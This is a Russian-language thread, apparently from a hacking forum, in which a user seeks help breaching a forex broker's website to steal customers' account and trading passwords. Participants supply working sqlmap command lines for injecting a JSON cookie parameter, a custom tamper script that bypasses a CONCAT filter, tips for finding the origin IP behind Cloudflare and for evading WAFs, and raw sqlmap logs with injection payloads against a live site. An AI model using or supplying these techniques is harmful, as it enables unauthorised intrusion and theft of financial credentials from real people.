• XSS.stack #1 – первый литературный журнал от юзеров форума

нужна помощь в взломе с использованием sqlmap

ilqar200

RAID-массив
Пользователь
Регистрация
19.02.2022
Сообщения
70
Реакции
5
Здравствуйте уважаемые форумчане.Я новичок в программировании и в взломе.Прошу меня извинить за откровенную просьбу помочь мне в взломе. Я знаю что это наказуемо и готов сам нести ответственность за это.Прошу меня извинить если я создал тему не в правильной ветке.Прошу еще извинит меня за длинный текст. Я постарался объяснить более детально .Итак сут этой темы :
Я хочу взломать некого брокера форекс. Хочу получить данные (пароли от личных кабинет,номера и пароли торговых счетов) пользователей. Знаю что это трудно сделать или даже невозможно. Но я хочу попробовать.Я узнал с помощью сервиса https://suip.biz/ru/?act=hostmap ip адрес сайта брокера. Этот сайт находиться на Cloudflare.С помощью этого сервиса я узнал соседние сайты тоже.Я решил не напрямую атаковать сайт брокера а найти уязвимости на соседних сайтах.Я запустил скан в burp suite на один из соседних сайтов.Burp suite нашел sql инъекцию на этом сайте.Sql инъекция была в json параметре cookie файла в GET запросе.Немного прочитав про sql инъекцию я сумел отправить запросы с помощью burp suite.Результаты запросов появлялись не напрямую на странице а только через ошибок запроса т.е была error based sql инъекция.Некоторые запросы cloudflare блокировал.В этом случае я делал обходные запросы и они выполнялись успешно. С помощью запросов я узнал имя пользователя под которым я делал запросы,версию базы данных(mysql 5.7.28),имена таблиц information.shema и таблиц базы сайта. Cookie в GET запросе в burp suite был в таком формате: параметр={"параметр1":"значение1","параметр2":"значение2","уязвимыйпараметр":"значение", и т.д }.Burp suite нашел sql инъекцию поставив символы \" после значение в уязвимом параметре т.е cookie было вот так в запросе в burp suite :параметр={"параметр1":"значение1","параметр2":"значение2","уязвимыйпараметр":"значение\"", и т.д }.Я отправлял запросы подставляя запросы в cookie файле после символов \" и запросы успешно выполнялись. Я решил использовать sqlmap чтобы автоматизировать процесс. Но к моему сожалению правильно инжектировать уязвимый параметр с помощью sqlmap я не смог.
Я запустил sqlmap с ключами -r httprequest.txt --level=5 --risk=3 --dbms=mysql. В httprequest.txt скопировал вес запрос от burpsuite и поставил * на том месте где мне нужно была инжектировать но безрезультатно.Я запустил sqlmap с ключами -u "полный url" --cookie="данные куки файла" -p "уязвимый параметр" --level=5 --risk=3 --dbms=mysql но тоже безрезультатно.В обоих случаях sqlmap не находил уязвимый json параметр в cookie файле и инжектировалься в url что неправильно в данном случае.Немного прочитав я узнал чтобы sqlmap нашел уязвимый json параметр в cookie файле нужно написать скрипт на python и с помощью ключа --tamper=имяскрипта.py запустит sqlmap. Итак мои вопросы :
1) Что нужно написать в коде скрипта python чтобы решить задачу нахождения json параметра в cookie файле sqlmap-ом ? Если это будет не малый код то хотя бы примерное направление.
2) Во время моего эксперимента админ нашел противодействие против моего эксперимента. Он урезал права пользователя под которым я делал запросы. Теперь мои запросы которые я делал для получение таблиц ничего не показывают ,не появляются сообщение об ошибке . При успешном выполнении некого запроса появляется сообщение execute command denied to user ' имя_пользователя' for routine 'база_сайта'.Но само SQL инъекция все еще присутствует на сайте.Можно ли дальше продвинуться после урезание прав в этом взломе с помощью этой sql инъекции или нужно искать уже другие пути взлома ?
Чтобы дальше продвинуться в взломе мне важно узнать ответ на мой 1-ый вопрос.
Спасибо заранее за ответы и помощь.
 
С помощью этого сервиса я узнал соседние сайты тоже.Я решил не напрямую атаковать сайт брокера а найти уязвимости на соседних сайтах.
Что значит на соседних? Имеете ввиду субдомены этого сайта брокера? Или что?

Я запустил sqlmap с ключами -r httprequest.txt
Покажите что у вас в этом файле с запросом, сайт измените на другой, дабы не палить.

2) Во время моего эксперимента админ нашел противодействие против моего эксперимента. Он урезал права пользователя под которым я делал запросы. Теперь мои запросы которые я делал для получение таблиц ничего не показывают ,не появляются сообщение об ошибке
Вы крутили скулю напрямую через CloudFlare как я понял. С недавних пор у CF есть замечательная функция уведомлений, это уведомления на почту когда начинается DDoS или WAF детектит какие то действия связанные с попытками экслуатации уязвимостей. То есть, вы начинаете крутить скулю, и если WAF хоть раз сработал пока вы крутите - тут же владелец сайта получает на почту письмо "Аларм! Вас ломают!" Надо было реальный IP за CF пробовать вытаскивать, и через него работать.
 
Последнее редактирование:
Насколько я понял, IDS обнаружила вас и владелец, должно быть, исправил вульну, но до этого вы должны были полностью понять, что вы делаете, прежде чем запускать sqlmap, что привело бы к большому количеству шума, запускающего IDS на месте, если вы все еще думаете, что это возможно провернуть с запросом, который у вас есть, вы можете написать мне и поделиться запросом, который может помочь вам найти, что вы сделали неправильно.



from what I understood the IDS detected you and the owner must've patched the vuln, prior to that though you should've fully understood what u were doing before pulling a sqlmap run that would lead to much noise triggering the IDS in place if you still think its possible to pull it off with the request you have you can message me and share the request can help you find what you did wrong.
 
Что значит на соседних? Имеете ввиду субдомены этого сайта брокера? Или что?


Покажите что у вас в этом файле с запросом, сайт измените на другой, дабы не палить.


Вы крутили скулю напрямую через CloudFlare как я понял. С недавних пор у CF есть замечательная функция уведомлений, это уведомления на почту когда начинается DDoS или WAF детектит какие то действия связанные с попытками экслуатации уязвимостей. То есть, вы начинаете крутить скулю, и если WAF хоть раз сработал пока вы крутите - тут же владелец сайта получает на почту письмо "Аларм! Вас ломают!" Надо было реальный IP за CF пробовать вытаскивать, и через него работать.
Здравствуйте. Спасибо за ответы. Говоря соседних я имел ввиду сайты которые находиться на одном и том же сервере с сайтом брокера.Вот ниже содержимое файла запроса . Уязвимый параметр который нашел Burp suite этого json параметр language.Burp поставил символы \" после значение SAR и нашел SQL иньекцию. Вместо символа * внизу в запросе ставил sql запросы и они выполнялись успешно.
GET /user/index HTTP/2
Host: www.uyazvimiysayt.com
Cookie: PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C; language=%7b%22languageCode%22%3a%22AR%22%2c%22languageId%22%3a%221%22%2c%22phoneCode%22%3a%22966%22%2c%22currency%22%3a%22SAR%5c%*%22%2c%22countryCode%22%3a%22SA%22%2c%22countryId%22%3a%228405%22%7d; defaultSetLanguage=ar
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: www.uyazvimiysayt.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Я уже прочитал и понял как работает Cloudflare. Я понял что данный сайт запрос к которому я привел выше не имеет отношений к сайту брокеру. Это я просто не правильно поняв сделал атаку на этот сайт .Я нашел уже реальный ip сайта брокера и нашел хостинг провайдера этого брокера тоже.Проверил с помощью suip этот ip и он мне показал домены этого брокера.Сайт этого брокера хоститься на 2-х хостинг провайдерах.С помощью suip нашел соседний сайт этого брокера . Буду проверять этот сайт. Но сначала буду проверять самого сайта брокера.Проверю конечно с осторожностью скрываю себя тщательно. Дальше продвинуться в взломе мне нужно правильно инжектить sqlmap в случаях где нужно инжектить на json параметр в cookie.На данные момент у меня проблема с этим в sqlmap-е. Как я сказал выше нужно написать python скрипт и с помощью этого скрипта запустить sqlmap с параметром --tamper=имя_скрипта.py . После этого sqlmap правильно инжектиться в правильный json параметр в cookie. Но какой код я должен написать в этом python скрипте этого я не знаю.
 
Последнее редактирование:
Насколько я понял, IDS обнаружила вас и владелец, должно быть, исправил вульну, но до этого вы должны были полностью понять, что вы делаете, прежде чем запускать sqlmap, что привело бы к большому количеству шума, запускающего IDS на месте, если вы все еще думаете, что это возможно провернуть с запросом, который у вас есть, вы можете написать мне и поделиться запросом, который может помочь вам найти, что вы сделали неправильно.



from what I understood the IDS detected you and the owner must've patched the vuln, prior to that though you should've fully understood what u were doing before pulling a sqlmap run that would lead to much noise triggering the IDS in place if you still think its possible to pull it off with the request you have you can message me and share the request can help you find what you did wrong.
Ответил выше или перейдите пожалуйста по ссылка на мой ответ выше :https://xss.pro/threads/63219/post-424277
 
Говоря соседних я имел ввиду сайты которые находиться на одном и том же сервере с сайтом брокера.
Вы имеете ввиду сервер CloudFlare? Тогда это бесполезно. Сайт брокера вряд ли стоит на одном сервере с кем то, у них отдельный физический сервер со своим отдельным IP который спрятан за CloudFlare, я уверен на 100%.

Код:
--cookie="{\"user_id\":\"7\*\"}"

Вот так кука в JSON без проблем передается, ни каких тамперов не надо. Если скинете сюда куку в нормальном виде без энкода то покажу наглядно на вашей куке.
 
Вы имеете ввиду сервер CloudFlare? Тогда это бесполезно. Сайт брокера вряд ли стоит на одном сервере с кем то, у них отдельный физический сервер со своим отдельным IP который спрятан за CloudFlare, я уверен на 100%.

Код:
--cookie="{\"user_id\":\"7\*\"}"

Вот так кука в JSON без проблем передается, ни каких тамперов не надо. Если скинете сюда куку в нормальном виде без энкода то покажу наглядно на вашей куке.
Я имел ввиду сервер хостинг провайдера не Cloudflare т.е говоря "соседние сайты" я имел ввиду сайты которые находиться на одном и том же сервере хостинг провайдера что и сайт брокера. Но не в этом суть . Я как сказал выше уже нашел реальный ip сайта брокера и хостинг провайдера этого брокера.Вы правы в том что брокера арендуют отдельные физические сервера и никакие другие сайты обычно не бывают на их серверов. Но все таки один " соседний сайт " есть контент который не имеет отношений к брокеру. Эта какой-то турецкий онлайн магазин еды. Я узнал это с помощью сервиса suip. Suip показывает мне главный сайт этого брокера и другие домены этого брокера на основе найденной мною ip адреса.Наверное если suip показывает это значить этот ip и есть реальный ip сайта брокера. Осталось анализировать и сайт брокера и домены брокера и этот онлайн магазин на наличие уязвимостей в них. На счет cookie . Вот нормальный cookie:
PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR","countryCode":"SA","countryId":"8405"}; defaultSetLanguage=ar
Burp нашел sql иньекцию после постановки символов \" после значение SAR т.е в Burp cookie выглядеть вот так :
PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR\"","countryCode":"SA","countryId":"8405"}; defaultSetLanguage=ar
В этом случае как запустить sqlmap чтобы он инжектировалься правильно ?
 
Код:
--cookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"966\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defaultSetLanguage=ar"

Мап будет спрашивать имплиментацию, попробуйте сначла Y, если не раскрутит то пробуйте N.
 
Код:
--cookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"966\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defaultSetLanguage=ar"

Мап будет спрашивать имплиментацию, попробуйте сначла Y, если не раскрутит то пробуйте N.
Не правильно инжектировалься опять. запустил так :
python.exe sqlmap.py -v 6
-u "https://www.sayt.com/user/index" --force-ssl --drop-set-cookie --c
ookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2
C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"96
6\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defau
ltSetLanguage=ar" --user-agent=" Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple
WebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" --dbms=mysq
l --fresh-queries --flush-session
вот результаты :

[*] starting @ 20:25:41 /2022-02-21/
[20:25:41] [DEBUG] cleaning up configuration parameters
[20:25:41] [DEBUG] setting the HTTP timeout
[20:25:41] [DEBUG] setting the HTTP Cookie header
[20:25:41] [DEBUG] setting the HTTP User-Agent header
[20:25:41] [DEBUG] creating HTTP requests opener object
[20:25:41] [DEBUG] forcing back-end DBMS to user defined value
[20:25:42] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] ' ЗДЕСЬ Я НАЖАЛ N
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] ' ЗДЕСЬ Y
[20:26:11] [INFO] flushing session file
[20:26:11] [DEBUG] resolving hostname 'www.sayt.com'
[20:26:11] [INFO] testing connection to the target URL
[20:26:11] [TRAFFIC OUT] HTTP request [#1]:
GET /user/index HTTP/1.1
Cache-control: no-cache
Cookie: PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR\","countryCode":"SA","countryId":"8405"}; defaultSetLanguage=ar
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Host: www.sayt.com
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[20:26:13] [DEBUG] declared web page charset 'utf-8'
[20:26:13] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp1251') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
[20:26:13] [TRAFFIC IN] HTTP response [#1] (200 OK):
Date: Mon, 21 Feb 2022 16:26:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language=%7B%22languageCode%22%3A%22AR%22%2C%22languageId%22%3A%221%22%2C%22phoneCode%22%3A%22966%22%2C%22currency%22%3A%22SAR%22%2C%22countryCode%22%3A%22SA%22%2C%22countryId%22%3A%228405%22%7D; expires=Fri, 22-Apr-2022 16:26:09 GMT; Max-Age=5184000; path=/; domain=sayt.com; secure
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 6e1155ae5e0f51a7-IST
Content-Encoding: gzip
URI: https://www.sayt.com:443/user/index

дальше идет html код страницы далее вот это :

[20:26:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:26:13] [PAYLOAD] 9200 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[20:26:13] [TRAFFIC OUT] HTTP request [#2]:
GET /user/index?ChmE=9200%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1
Cache-control: no-cache
Cookie: PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR\","countryCode":"SA","countryId":"8405"}; defaultSetLanguage=ar
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Host: www.sayt.com
Accept: */*
Accept-encoding: gzip,deflate
Connection: close
[20:26:14] [TRAFFIC IN] HTTP response [#2] (403 Forbidden):
Date: Mon, 21 Feb 2022 16:26:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=15
Expires: Mon, 21 Feb 2022 16:26:25 GMT
X-Frame-Options: SAMEORIGIN
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 6e1155b85bbb7204-IST
Content-Encoding: gzip
URI: https://www.sayt.com:443/user/index... EXEC xp_cmdshell('cat ../../../etc/passwd')#

далее идет html код страницы-блокировки Cloudflare
Как видите инжект идет в url а не в параметр cookie. Что надо исправить ?
 
Код:
sqlmap.py -u "https://site.com" --cookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"966\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defaultSetLanguage=ar" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v5 --skip-waf --flush-session

Только что тестил на рандомном сайте, инжект в куку идет и идет нормально, в JSON. Именно мой запрос (со своим сайтом, разумеется) попробуйте, и скиньте сюда результат в тег CODE. Если сайт будет пытаться ставить свои куки - не дропайте, пусть ставит.
 
Последнее редактирование:
Код:
sqlmap.py -u "https://site.com" --cookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"966\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defaultSetLanguage=ar" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v5 --skip-waf --flush-session

Только что тестил на рандомном сайте, инжект в куку идет и идет нормально, в JSON. Именно мой запрос (со своим сайтом, разумеется) попробуйте, и скиньте сюда результат в тег CODE. Если сайт будет пытаться ставить свои куки - не дропайте, пусть ставит.
Теперь получился длинный результат.Почему то sqlmap не нашел этот параметр уязвимым . Он сделал 11766 запросов и вот последние строки :

[14:16:09] [TRAFFIC IN] HTTP response [#11766] (200 OK):
Date: Tue, 22 Feb 2022 10:16:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language=%7B%22languageCode%22%3A%22AR%22%2C%22languageId%22%3A%221%22%2C%22phoneCode%22%3A%22966%22%2C%22currency%22%3A%22SAR%22%2C%22countryCode%22%3A%22SA%22%2C%22countryId%22%3A%228405%22%7D; expires=Sat, 23-Apr-2022 10:16:06 GMT; Max-Age=5184000; path=/; domain=sayt.com; secure
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 6e177500be02690f-FRA
Content-Encoding: gzip
URI: https://www.sayt.com:443/user/index
[14:16:09] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not seem to be injectable
[14:16:09] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[*] ending @ 14:16:09 /2022-02-22/

Может дело в том что символ * не в правильном месте поставлен ? sqlmap делает инжект так :

[13:25:06] [PAYLOAD] {"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR\') ORDER BY 2346-- -
А в Burp я делал запрос вот так :
{"languageCode":"AR","languageId":"1","phoneCode":"966","currency":"SAR\" order by 1,2,3,4-- -","countryCode":"SA","countryId":"8405"}
Я проверил сейчас после этого запроса в результате в Burp появилась :Unknown column '4' in 'order clause'
Вместо order by 1,2,3,4 поставлял другие запросы и они выполнялись успешно тоже.
Как нужно запустить sqlmap чтобы правильно получились запросы ?
 
Скрытое содержимое

Скрытое содержимое
да не только в этом проблема . По моему он должен добавить после символа \ и символ " и только после этого уже сделать запросы . В конце запроса должен стоять вот это : -- -
 
зря вы так открыто сайт скинули, щас его либо положат, либо владельцу сообщат.
Я сразу отредактировал выше сообщение
 
Последнее редактирование:
Крч кому интересно в чем была проблема:

Код:
sqlmap.py -u "https://www.site.com/user/index" --cookie="PHPSESSID=hm0t1luu9hqfha7i27o36bf1ec; ucid=0AF1305A-0467-A5AE-BB7D-100EB2C2611C;language={\"languageCode\":\"AR\",\"languageId\":\"1\",\"phoneCode\":\"966\",\"currency\":\"SAR\*\",\"countryCode\":\"SA\",\"countryId\":\"8405\"}; defaultSetLanguage=ar" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v3 --technique=E --skip-waf --tamper=lowercase,2 --drop-set-cookie
Вот так крутанули, с небольшим кастылем в виде такого тампера который обходит фильтр на CONCAT:
Код:
#!/usr/bin/env python

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
   
    return payload.replace("CONCAT", 'concat/**x**/') if payload else payload

Таким образом мап теперь детектит скулю. Но теперь надо дальше обходить waf cloudflare, но это уже совсем другая история..
 
Последнее редактирование:
Столкнулся с похожей проблемой:
Sqlmap показывет точку входа, но не может определить dbms, ошибки соединения нет
Сайт на asp.net
AWS
Тампер использовал charunicodeencode.py с максимальным level, risk
Подскажите, возможно ли докрутить?
 
Столкнулся с похожей проблемой:
Sqlmap показывет точку входа, но не может определить dbms, ошибки соединения нет
Сайт на asp.net
AWS
Тампер использовал charunicodeencode.py с максимальным level, risk
Подскажите, возможно ли докрутить?
обвязку из ключевых слов разбей, и пошифруй хотя бы тем же base64 - в 50% хватает
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх